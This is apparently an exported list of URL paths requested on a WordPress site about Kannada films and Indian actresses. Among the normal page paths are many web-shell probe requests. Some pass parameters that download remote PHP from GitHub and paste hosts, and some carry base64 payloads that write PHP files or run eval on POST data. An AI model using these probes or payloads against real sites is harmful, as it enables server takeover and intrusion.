    <t>.remote</t>
  </si>
  <si>
    <t>category/tamil-serial-actress/</t>
  </si>
  <si>
    <t>wp-content/plugins/essential-addons-for-elementor-lite/includes/Traits/Shared.php</t>
  </si>
  <si>
    <t>wp-content/plugins/hello-dolly/hello.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-doft/noimg.php</t>
  </si>
  <si>
    <t>wp-content/themes/twenty/twenty.php</t>
  </si>
  <si>
    <t>wp-content/plugins/envato-market/inc/class-envato-market-api.php</t>
  </si>
  <si>
    <t>wp-admin/images/install.php</t>
  </si>
  <si>
    <t>css/install.php</t>
  </si>
  <si>
    <t>wp-content/install.php</t>
  </si>
  <si>
    <t>wp-content/plugins/install.php</t>
  </si>
  <si>
    <t>install.php</t>
  </si>
  <si>
    <t>wp-content/patior/</t>
  </si>
  <si>
    <t>.well-known/admin.php</t>
  </si>
  <si>
    <t>wp-content/plugins/seoo/wsoyanz.php</t>
  </si>
  <si>
    <t>alfa-rex.php</t>
  </si>
  <si>
    <t>wp-info.php</t>
  </si>
  <si>
    <t>wp-admin/x.php?action=768776e296b6f286f26796e2a72607e2972647</t>
  </si>
  <si>
    <t>ccx/</t>
  </si>
  <si>
    <t>wp-admin/css/colors/coffee/about.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/about.php</t>
  </si>
  <si>
    <t>wp-includes/blocks/table/int/tmpl/</t>
  </si>
  <si>
    <t>cgi-bin/moon.php</t>
  </si>
  <si>
    <t>.well-known/acme-challenge/my1.php</t>
  </si>
  <si>
    <t>cgi-bin/my1.php</t>
  </si>
  <si>
    <t>my1.php</t>
  </si>
  <si>
    <t>wp-includes/Requests/Cookie/my1.php</t>
  </si>
  <si>
    <t>wp-admin/images/my1.php</t>
  </si>
  <si>
    <t>wp-admin/maint/moon.php</t>
  </si>
  <si>
    <t>wp-admin/js/widgets/moon.php</t>
  </si>
  <si>
    <t>wp-admin/images/moon.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/ok.php?bads</t>
  </si>
  <si>
    <t>rindex.php?action=add&amp;parameter=ok.php%7Chttps://raw.githubusercontent.com/H0rn3t-Sp1d3rs/H0rn3t-Sp1d3rs/main/o.txt</t>
  </si>
  <si>
    <t>wp-content/style-css.php</t>
  </si>
  <si>
    <t>vafgvvyx.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>irxjqmcz.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>hotswulm.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>sroxgglw.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-admin/maint/upfile.php</t>
  </si>
  <si>
    <t>wp-admin/network/upfile.php</t>
  </si>
  <si>
    <t>ufaawbfn.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>gedquanv.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>.well-known/pki-validation/admin.php</t>
  </si>
  <si>
    <t>wp-content/plugins/hellopress/wp_mna.php</t>
  </si>
  <si>
    <t>.well-known/pki-validation/moon.php</t>
  </si>
  <si>
    <t>wp-includes/sodium_compat/network.php</t>
  </si>
  <si>
    <t>wp-includes/IXR/class-IXR-date-ajax-response.php</t>
  </si>
  <si>
    <t>wp-content/themes/hello-element/footer.php</t>
  </si>
  <si>
    <t>alfanew.php7</t>
  </si>
  <si>
    <t>alfanew.php</t>
  </si>
  <si>
    <t>wp-content/themes/sketch/404.php</t>
  </si>
  <si>
    <t>wp-content/themes/themes.php</t>
  </si>
  <si>
    <t>ccx/aa/</t>
  </si>
  <si>
    <t>wp-content/wp-links.php</t>
  </si>
  <si>
    <t>hmmnpxmb.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2h6cG9pLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>batm.php</t>
  </si>
  <si>
    <t>504.php</t>
  </si>
  <si>
    <t>444.php</t>
  </si>
  <si>
    <t>hoohgfqd.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>pbkhvbsc.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3Z0bGp0LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2F1Z2FwLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>wp-content/plugins/easybusy/xleet.php</t>
  </si>
  <si>
    <t>wp-content/plugins/rxr/rx.php</t>
  </si>
  <si>
    <t>trlpqaon.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>yfvpzlyz.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>qtnvwzrw.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>fszsveej.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>yqrxwruz.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>kannada-movies/%e0%b2%95%e0%b2%a8%e0%b3%8d%e0%b2%a8%e0%b2%a1-%e0%b2%9a%e0%b2%bf%e0%b2%a4%e0%b3%8d%e0%b2%b0-%e0%b2%ae%e0%b2%be%e0%b2%b0%e0%b3%8d%e0%b2%9f%e0%b2%bf%e0%b2%a8%e0%b3%8d-%e0%b2%ac%e0%b2%bf%e0%b2%a1/</t>
  </si>
  <si>
    <t>kannada-essay/kannada-essay-namma-kere-nammura-kere-%e0%b2%95%e0%b2%a8%e0%b3%8d%e0%b2%a8%e0%b2%a1-%e0%b2%aa%e0%b3%8d%e0%b2%b0%e0%b2%ac%e0%b2%82%e0%b2%a7-%e0%b2%a8%e0%b2%ae%e0%b3%8d%e0%b2%ae-%e0%b2%95%e0%b3%86/</t>
  </si>
  <si>
    <t>2023/03/01/</t>
  </si>
  <si>
    <t>2023/03/02/</t>
  </si>
  <si>
    <t>hindi-serial-actress/popular-hindi-serial-actress-part-1/</t>
  </si>
  <si>
    <t>2023/03/03/</t>
  </si>
  <si>
    <t>2023/03/10/</t>
  </si>
  <si>
    <t>hindi-serial-actress/popular-indian-serial-actress-part-2/</t>
  </si>
  <si>
    <t>2023/03/12/</t>
  </si>
  <si>
    <t>2023/03/15/</t>
  </si>
  <si>
    <t>bollywood-movies/a-horror-movie-you-should-not-miss/</t>
  </si>
  <si>
    <t>page/3/</t>
  </si>
  <si>
    <t>2023/04/17/</t>
  </si>
  <si>
    <t>updates/updates-17-april-2023/</t>
  </si>
  <si>
    <t>2023/04/18/</t>
  </si>
  <si>
    <t>updates/new-profiles-added-18-april-2023/</t>
  </si>
  <si>
    <t>2023/04/19/</t>
  </si>
  <si>
    <t>updates/photos-added-19-april-2023/</t>
  </si>
  <si>
    <t>updates/updates-20-april-2023/</t>
  </si>
  <si>
    <t>actress-anchors-models/%e0%b2%b6%e0%b2%be%e0%b2%95%e0%b3%81%e0%b2%82%e0%b2%a4%e0%b2%b2%e0%b2%82-%e0%b2%9a%e0%b2%b2%e0%b2%a8%e0%b2%9a%e0%b2%bf%e0%b2%a4%e0%b3%8d%e0%b2%b0-%e0%b2%b5%e0%b2%bf%e0%b2%ae%e0%b2%b0%e0%b3%8d%e0%b2%b6/</t>
  </si>
  <si>
    <t>2023/04/20/</t>
  </si>
  <si>
    <t>actress-anchors-models/%e0%b2%ae%e0%b2%bf%e0%b2%b8%e0%b3%86%e0%b2%b8%e0%b3%8d-%e0%b2%b5%e0%b3%8b%e0%b2%97%e0%b3%8d%e0%b2%b8%e0%b3%8d%e0%b2%9f%e0%b2%be%e0%b2%b0%e0%b3%8d-%e0%b2%87%e0%b2%82%e0%b2%a1%e0%b2%bf%e0%b2%af/</t>
  </si>
  <si>
    <t>2023/04/21/</t>
  </si>
  <si>
    <t>updates/updates-21-april-2023/</t>
  </si>
  <si>
    <t>2023/04/27/</t>
  </si>
  <si>
    <t>actress-anchors-models/updates-27-april-2023/</t>
  </si>
  <si>
    <t>actress-anchors-models/updates-29-april-2024/</t>
  </si>
  <si>
    <t>kannada-movies/%e0%b2%87%e0%b2%ac%e0%b3%8d%e0%b2%ac%e0%b2%a8%e0%b2%bf%e0%b2%af%e0%b2%b2%e0%b3%8d%e0%b2%b2%e0%b2%bf-%e0%b2%ae%e0%b2%bf%e0%b2%82%e0%b2%a6%e0%b3%86%e0%b2%a6%e0%b3%8d%e0%b2%a6-%e0%b2%ae%e0%b2%af%e0%b3%82/</t>
  </si>
  <si>
    <t>kannada-movies/%e0%b2%b8%e0%b3%8d%e0%b2%a8%e0%b3%87%e0%b2%b9%e0%b2%bf%e0%b2%a4%e0%b2%b0%e0%b2%bf%e0%b2%82%e0%b2%a6-%e0%b2%b8%e0%b3%8d%e0%b2%a8%e0%b3%87%e0%b2%b9%e0%b2%bf%e0%b2%a4%e0%b3%86%e0%b2%97%e0%b2%be%e0%b2%97/</t>
  </si>
  <si>
    <t>2023/04/29/</t>
  </si>
  <si>
    <t>actress-anchors-models/body-positivity-influencers-india/</t>
  </si>
  <si>
    <t>actress-anchors-models/swagatha-s-krishnan-talented-tamil-playback-singer-%e0%b2%b8%e0%b3%8d%e0%b2%b5%e0%b2%be%e0%b2%97%e0%b2%a4-%e0%b2%8e%e0%b2%b8%e0%b3%8d-%e0%b2%95%e0%b3%83%e0%b2%b7%e0%b3%8d%e0%b2%a3%e0%b2%a8%e0%b3%8d/</t>
  </si>
  <si>
    <t>kannada-movies/%e0%b2%b8%e0%b3%88%e0%b2%82%e0%b2%a7%e0%b2%b5%e0%b2%a8-%e0%b2%9c%e0%b3%8a%e0%b2%a4%e0%b3%86%e0%b2%97%e0%b3%86-%e0%b2%b6%e0%b3%8d%e0%b2%b0%e0%b2%a6%e0%b3%8d%e0%b2%a7%e0%b2%be-%e0%b2%b6%e0%b3%8d/</t>
  </si>
  <si>
    <t>actress-anchors-models/abhimanika/</t>
  </si>
  <si>
    <t>view.php?name=Abhimanika</t>
  </si>
  <si>
    <t>kannada-movies/%e0%b2%95%e0%b2%a8%e0%b3%8d%e0%b2%a8%e0%b2%a1%e0%b2%a6%e0%b2%b2%e0%b3%8d%e0%b2%b2%e0%b2%bf-%e0%b2%85%e0%b2%b5%e0%b2%95%e0%b2%be%e0%b2%b6-%e0%b2%b5%e0%b2%82%e0%b2%9a%e0%b2%bf%e0%b2%a4-%e0%b2%aa/</t>
  </si>
  <si>
    <t>kannada-serial-actress/popular-indian-serial-actress-part-4/</t>
  </si>
  <si>
    <t>actress-anchors-models/%e0%b2%a8%e0%b3%80%e0%b2%b5%e0%b3%81-%e0%b2%a8%e0%b2%bf%e0%b2%ae%e0%b3%8d%e0%b2%ae%e0%b2%a8%e0%b3%8d%e0%b2%a8%e0%b3%81-%e0%b2%a8%e0%b2%82%e0%b2%ac%e0%b2%bf%e0%b2%a6%e0%b2%b0%e0%b3%86-%e0%b2%af/</t>
  </si>
  <si>
    <t>kannada-kavana/%e0%b2%b9%e0%b3%82-%e0%b2%ae%e0%b2%a8%e0%b2%b8%e0%b2%bf%e0%b2%a8-%e0%b2%b9%e0%b3%81%e0%b2%a1%e0%b3%81%e0%b2%97%e0%b2%bf/</t>
  </si>
  <si>
    <t>view.php?name=Seethu</t>
  </si>
  <si>
    <t>kannada-kavana/%e0%b2%ac%e0%b2%a3%e0%b3%8d%e0%b2%a3%e0%b2%97%e0%b2%b3%e0%b2%b2%e0%b3%8d%e0%b2%b2%e0%b2%bf-%e0%b2%ac%e0%b3%86%e0%b2%b0%e0%b3%86%e0%b2%a4%e0%b2%b5%e0%b2%b3%e0%b3%81/</t>
  </si>
  <si>
    <t>actress-anchors-models/indian-celebrities-social-media-influencer-prajakta-koli/</t>
  </si>
  <si>
    <t>2023/</t>
  </si>
  <si>
    <t>author/admin/page/5/</t>
  </si>
  <si>
    <t>author/admin/page/2/</t>
  </si>
  <si>
    <t>actress-anchors-models/updates-20-august-2023/</t>
  </si>
  <si>
    <t>2022/11/</t>
  </si>
  <si>
    <t>2023/02/</t>
  </si>
  <si>
    <t>2023/03/</t>
  </si>
  <si>
    <t>2023/04/</t>
  </si>
  <si>
    <t>2023/05/</t>
  </si>
  <si>
    <t>2023/06/</t>
  </si>
  <si>
    <t>2023/07/</t>
  </si>
  <si>
    <t>2023/08/</t>
  </si>
  <si>
    <t>page/5/</t>
  </si>
  <si>
    <t>page/2/</t>
  </si>
  <si>
    <t>2023/04/30/</t>
  </si>
  <si>
    <t>2023/05/02/</t>
  </si>
  <si>
    <t>2023/05/07/</t>
  </si>
  <si>
    <t>2023/05/15/</t>
  </si>
  <si>
    <t>2023/05/17/</t>
  </si>
  <si>
    <t>2023/05/20/</t>
  </si>
  <si>
    <t>2023/05/21/</t>
  </si>
  <si>
    <t>2023/06/24/</t>
  </si>
  <si>
    <t>2023/07/09/</t>
  </si>
  <si>
    <t>2023/08/20/</t>
  </si>
  <si>
    <t>support-us/</t>
  </si>
  <si>
    <t>register.php</t>
  </si>
  <si>
    <t>403.php</t>
  </si>
  <si>
    <t>chtmlfuns.php</t>
  </si>
  <si>
    <t>wp-content/hader/seothemes/autoload_classmap.php</t>
  </si>
  <si>
    <t>wp-content/themes/codtheme/404.php</t>
  </si>
  <si>
    <t>wp-content/plugins/contus-hd-flv-player/uploadVideo.php</t>
  </si>
  <si>
    <t>wp-content/plugins/posts-layouts/src/</t>
  </si>
  <si>
    <t>wp-content/themes/Divi/404.php</t>
  </si>
  <si>
    <t>viewup.php?name=Suvitha%20Rajendran&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>edqascxm.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>pxsrlrcx.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>rnxeqtxj.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>iyoedhta.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>nnwcclub.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>symwfcsc.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>xkdioqes.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>liaocnhe.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>jk</t>
  </si>
  <si>
    <t>qqadsorv.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>emmmxtsi.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>/wp-admin/css/colors/blue/blue.php?wall=CiAgJGZjID0gJ1BEOXdhSEFnWldOb2J5QW5QSEJ5WlQ0bkxuQm9jRjkxYm1GdFpTZ3BMaUpjYmlJdUp6eGljaTgrUEdadmNtMGdiV1YwYUc5a1BTSndiM04wSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaVgxOGlQanhwYm5CM</t>
  </si>
  <si>
    <t>rindex.php?action=add&amp;parameter=sex.php%7Chttps://raw.githubusercontent.com/Professor6T9/uploaders/main/taf.txt</t>
  </si>
  <si>
    <t>wryuwcac.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wanspnle.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-includes/Requests/Text/wp-login.php</t>
  </si>
  <si>
    <t>components/com_newsfeeds/models/indexx.php</t>
  </si>
  <si>
    <t>wp-admin/atomlib.php</t>
  </si>
  <si>
    <t>wp-includes/sodium_compat/lib/about.php</t>
  </si>
  <si>
    <t>wp-includes/IXR/about.php</t>
  </si>
  <si>
    <t>wp-includes/js/tinymce/utils/about.php</t>
  </si>
  <si>
    <t>wp-includes/images/about.php</t>
  </si>
  <si>
    <t>wp-includes/rest-api/about.php</t>
  </si>
  <si>
    <t>wp-content/dropdown.php</t>
  </si>
  <si>
    <t>wp-content/uploads/hanna1337.php</t>
  </si>
  <si>
    <t>wp-content/themes/exs-church/template-parts/new.php</t>
  </si>
  <si>
    <t>wp-config/wp-incluides/soft/wp-widget.php</t>
  </si>
  <si>
    <t>wp-includes/random_compat/about.php</t>
  </si>
  <si>
    <t>wp-content/wp-data.php</t>
  </si>
  <si>
    <t>wp-content/plugins/chart-builder/admin/class-chart-builder.php</t>
  </si>
  <si>
    <t>wp-includes/Requests/Text/</t>
  </si>
  <si>
    <t>wp-admin/ss.php</t>
  </si>
  <si>
    <t>wp-admin/network/network.php</t>
  </si>
  <si>
    <t>wp-good.php</t>
  </si>
  <si>
    <t>LA.php</t>
  </si>
  <si>
    <t>wp-admin/ngetes.php</t>
  </si>
  <si>
    <t>upfile.php</t>
  </si>
  <si>
    <t>plugin-install.php</t>
  </si>
  <si>
    <t>wp-add.php</t>
  </si>
  <si>
    <t>moon.php</t>
  </si>
  <si>
    <t>wp-blog.php</t>
  </si>
  <si>
    <t>wp-admin.php</t>
  </si>
  <si>
    <t>igflsevp.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>ggkepmtp.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-admin/user/moon.php</t>
  </si>
  <si>
    <t>wp-content/themes/twentyseventeen/page/</t>
  </si>
  <si>
    <t>cgi-bin/install.php</t>
  </si>
  <si>
    <t>wpylfnxv.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>ypfwgjml.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-content/themes/fotogenic/wrapper.php</t>
  </si>
  <si>
    <t>wp-content/plugins/core-stab/</t>
  </si>
  <si>
    <t>templates/protostar/error.php</t>
  </si>
  <si>
    <t>wp-includes/blocks/table/int/tmpl/?p=wp-content/</t>
  </si>
  <si>
    <t>wp-includes/compat/embed/theme/?p=wp-content/</t>
  </si>
  <si>
    <t>wp-content/plugins/hellopress/wp_filemanager.php</t>
  </si>
  <si>
    <t>wp-content/plugins/ninja-forms/assets/css/nf-form-block-style.css</t>
  </si>
  <si>
    <t>ytaddish.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>kheedoko.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-content/plugins/rpobm/ng.php</t>
  </si>
  <si>
    <t>wp-content/uploads/2022/12/core.php</t>
  </si>
  <si>
    <t>wp-includes/Requests/about.php</t>
  </si>
  <si>
    <t>wp-content/plugins/revslider/includes/external/page/defaul1.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/class.api.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wpdiscuz/themes/default/style-rtl.css</t>
  </si>
  <si>
    <t>wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php</t>
  </si>
  <si>
    <t>vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>fox-index.php</t>
  </si>
  <si>
    <t>wp-content/wp-old-index.php?action=login&amp;pass=-1&amp;submit=</t>
  </si>
  <si>
    <t>haders.php</t>
  </si>
  <si>
    <t>wp-content/plugins/config.bak.php</t>
  </si>
  <si>
    <t>wp-admin/config.bak.php</t>
  </si>
  <si>
    <t>old-index.php</t>
  </si>
  <si>
    <t>wp-includes/fonts/css.php</t>
  </si>
  <si>
    <t>wp-1ogin_bak.php</t>
  </si>
  <si>
    <t>wp-content/wp-1ogin_bak.php</t>
  </si>
  <si>
    <t>cindex.php</t>
  </si>
  <si>
    <t>alfindex.php</t>
  </si>
  <si>
    <t>th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</t>
  </si>
  <si>
    <t>larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</t>
  </si>
  <si>
    <t>wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</t>
  </si>
  <si>
    <t>wp-content/plugins/ioptimization/IOptimize.php?rchk</t>
  </si>
  <si>
    <t>wp-content/db_cache.php</t>
  </si>
  <si>
    <t>boom.php?x</t>
  </si>
  <si>
    <t>uiajvbct.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>alixyrvh.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>shell20211028/</t>
  </si>
  <si>
    <t>wp-content/langar.php</t>
  </si>
  <si>
    <t>wp-content/config.bak.php</t>
  </si>
  <si>
    <t>xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</t>
  </si>
  <si>
    <t>test.php?Ghost=send</t>
  </si>
  <si>
    <t>wp-includes/blocks/post-title/post-title/?of=1</t>
  </si>
  <si>
    <t>dgomttaz.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>rjfgrvns.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>tuoaguju.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>tuybwomh.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>rindex.php?action=add</t>
  </si>
  <si>
    <t>tag/mumbai-model/</t>
  </si>
  <si>
    <t>yvyfoaee.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>htufwvii.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-content/plugins/linkpreview/</t>
  </si>
  <si>
    <t>wp-includes/SimplePie/Content/about.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-resortpack/bradly.php</t>
  </si>
  <si>
    <t>gmbvcbxi.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>huwefgfk.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-content/plugins/invoicing/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Coder.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wordpress-three/miin.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-daft/t62.php</t>
  </si>
  <si>
    <t>rnxwaexa.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>rgognmzl.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>gslaakez.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>dzjpyadt.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>dup-installer/main.installer.php</t>
  </si>
  <si>
    <t>index.php</t>
  </si>
  <si>
    <t>stylec.php</t>
  </si>
  <si>
    <t>qepxagld.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>qrgawzmh.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-content/updates.php</t>
  </si>
  <si>
    <t>toccuyrs.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>ykadxorx.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>view.php?name=Niveditha%20Gowda</t>
  </si>
  <si>
    <t>viewup.php?name=Samyuktha%20Menon&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>wp-content/plugins/gatewayapi/inc/a57bze8931.php</t>
  </si>
  <si>
    <t>/wp-content/plugins/divi-contact-extended/includes/upload.php</t>
  </si>
  <si>
    <t>/wp-content/plugins/gatewayapi/inc/css_js.php</t>
  </si>
  <si>
    <t>wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php</t>
  </si>
  <si>
    <t>/wp-content/plugins/cherry-plugin/admin/import-export/upload.php</t>
  </si>
  <si>
    <t>wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php</t>
  </si>
  <si>
    <t>/wp-content/plugins/formcraft/file-upload/server/php/</t>
  </si>
  <si>
    <t>/wp-content/plugins/wp-engine-module/wp-engine.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-engine-module/a57bze8931.php</t>
  </si>
  <si>
    <t>wp-content/plugins/ioptimizations/a57bze8931.php</t>
  </si>
  <si>
    <t>/wp-content/plugins/ioptimization/IOptimize.php?rchk</t>
  </si>
  <si>
    <t>wp-content/plugins/ioptimization/a57bze8931.php</t>
  </si>
  <si>
    <t>/wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php</t>
  </si>
  <si>
    <t>wp-content/plugins/dzs-zoomsounds/a57bze8931.php</t>
  </si>
  <si>
    <t>/wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd</t>
  </si>
  <si>
    <t>view.php?name=Bhumi%20Pednekar</t>
  </si>
  <si>
    <t>rindex.php?action=add&amp;parameter=wwmclgiqhf.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Feesxg%2Fraw</t>
  </si>
  <si>
    <t>rindex.php?action=add&amp;parameter=hpujzjcrhq.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Feesxg%2Fraw</t>
  </si>
  <si>
    <t>bpnxegpg.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>qvhchekx.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>kouonuuw.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>puxzamgr.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>view.php?name=Suriya%20Praba</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=CiAgJGZjID0gJ1lVUnlhWFkwTFZCeWFYWTRJRlJQVDB3OFAzQm9jQ0JsWTJodklDYzhjSEpsUGljdWNHaHdYM1Z1WVcxbEtDa3VJbHh1SWk0blBHSnlMejQ4Wm05eWJTQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaVBqeHBibkIxZENCMGVYQmxQU0ptYV</t>
  </si>
  <si>
    <t>rgibkxuq.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>ursjlavj.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-content/repeater.php</t>
  </si>
  <si>
    <t>.seo.php</t>
  </si>
  <si>
    <t>ee.php</t>
  </si>
  <si>
    <t>wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyBDaGluYWZhbnM7ZXZhbCgkX1BPU1RbJ3h4J10pOw==</t>
  </si>
  <si>
    <t>viewup.php?name=Dimple%20Jain%201511&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>wp-content/plugins/column/miin.php</t>
  </si>
  <si>
    <t>viewup.php?name=Juhi%20Kritika&amp;date=2023-04-14</t>
  </si>
  <si>
    <t>2022/</t>
  </si>
  <si>
    <t>xl2023x.php</t>
  </si>
  <si>
    <t>.wp-hemes.php</t>
  </si>
  <si>
    <t>wp-content/plugins/owfsmac/maro.php</t>
  </si>
  <si>
    <t>wp-content/plugins/aryabot/mar.php</t>
  </si>
  <si>
    <t>wp-content/plugins/aryabot/mari.php</t>
  </si>
  <si>
    <t>wp-content/mari.php</t>
  </si>
  <si>
    <t>wp-admin/mari.php</t>
  </si>
  <si>
    <t>wp-admin/maint/mari.php</t>
  </si>
  <si>
    <t>wp-admin/css/maro.php</t>
  </si>
  <si>
    <t>wp-content/plugins/owfsmac/mar.php</t>
  </si>
  <si>
    <t>wp-admin/css/mari.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/maro.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/coffee/marijuana.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/coffee/mari.php</t>
  </si>
  <si>
    <t>marijuana.php</t>
  </si>
  <si>
    <t>m4r1ju4n4.php</t>
  </si>
  <si>
    <t>images/mar.php</t>
  </si>
  <si>
    <t>dzrupgtz.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>actress-anchors-models/popular-instagram-celebrities-part-1-%E0%B2%9C%E0%B2%A8%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%BF%E0%B2%AF-instagram-%E0%B2%B8%E0%B3%86%E0%B2%B2%E0%B3%86%E0%B2%AC%E0%B3%8D%E0%B2%B0%E0%B2%BF%E0%B2%9F/</t>
  </si>
  <si>
    <t>view.php?name=Sruthy%20Renjith%20Vaiga</t>
  </si>
  <si>
    <t>vakznrze.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>dxcpcmnb.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>tag/uorfi7i/</t>
  </si>
  <si>
    <t>viewup.php?name=Sreenidhi%20Swaminathan&amp;date=2023-04-14</t>
  </si>
  <si>
    <t>view.php?name=Nehal%20Vadoliya</t>
  </si>
  <si>
    <t>wp-content/plugins/ioptimization/uubxvqtujn.php?x=ooo</t>
  </si>
  <si>
    <t>rindex.php?action=add&amp;parameter=hhsomjedax.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw</t>
  </si>
  <si>
    <t>view.php?name=Ranjani%20Ramesh</t>
  </si>
  <si>
    <t>tag/bigg-boss-ott/</t>
  </si>
  <si>
    <t>view.php?name=Thejaswini%20Sharma</t>
  </si>
  <si>
    <t>dzguckrq.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>rsnyqmku.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>view.php?name=Ashwitha%204%20Real</t>
  </si>
  <si>
    <t>view.php?name=Dilsha%20Prasannan</t>
  </si>
  <si>
    <t>tag/kadambari/</t>
  </si>
  <si>
    <t>view.php?name=Donal%20Bisht</t>
  </si>
  <si>
    <t>view.php?name=Sophie%20Dee</t>
  </si>
  <si>
    <t>view.php?name=Carlotta%20Champagne</t>
  </si>
  <si>
    <t>viewup.php?name=Malavika%20Mohanan&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>tag/nibedita-paal/</t>
  </si>
  <si>
    <t>tag/mimi-bhattacharjee/</t>
  </si>
  <si>
    <t>viewup.php?name=Dimple%20Hayathi&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>view.php?name=Bhanusri%20Mehra</t>
  </si>
  <si>
